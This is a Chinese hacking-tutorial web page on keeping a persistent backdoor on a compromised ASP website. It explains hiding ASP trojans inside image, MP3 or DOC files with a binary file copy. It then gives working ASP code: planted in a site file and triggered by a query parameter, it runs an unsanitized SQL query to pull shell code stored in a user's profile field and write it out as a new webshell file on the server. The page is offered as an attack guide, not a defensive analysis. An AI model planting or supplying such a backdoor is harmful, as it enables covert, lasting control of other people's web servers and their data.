- 热门文章:
- · SQL注入的新技巧
- · 绕过Windows的身份认证
- · 软件限制策略的简单应用
- · 优化更安全:网络防火墙设置技巧
- · 维护不再是噩梦--网吧维护“圣经”
- · 刷QQ群的VBS脚本
- · 在自己的后院抵抗DNS攻击
- · 3种方法封锁BT下载
- · 系统安全技术研究
- · 菜鸟必练之入侵命令
- · Linux 2.4内核中新增功能指南
- · 攻---如何更简单的留你的webshell后门
上一篇:Mssql和Mysql的安全性分析 >>
巧妙利用.mdb后缀数据库做后门
我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦
copy 文件名/参数 + 文件名/参数 生成文件名
这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传 webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到
一个webshell之后...
我们所知道的,很多站点在用户注册的时候要让填好多东西例如:
用户名、密码、qq、邮箱、个人简介、电话、联系方式、住址一类的
而对应到数据库中也都会有相应的表 字段 值
我今天要做的就是 我注册一个用户在 我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下
废话少说了 大家看代码
| <% if request("action")="firefox" then fname=request.querystring("fn") tname=request.querystring("tn") bname=request.querystring("bn") id=request.querystring("id") idvalue=request.querystring("idv") set rs=server.createobject("adodb.recordset") sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&"""" rs.open sql,conn,1,3 if not rs.eof then content=rs(bname) else response.write "nothing" end if set fso=server.createobject("scripting.filesystemobject") set txtfile=fso.createtextfile(server.mappath(fname)) txtfile.writeline(content) txtfile.close end if %> 下一篇:SQL注入的新技巧 >> 相关文章:
© 2006 www.java-asp.net
|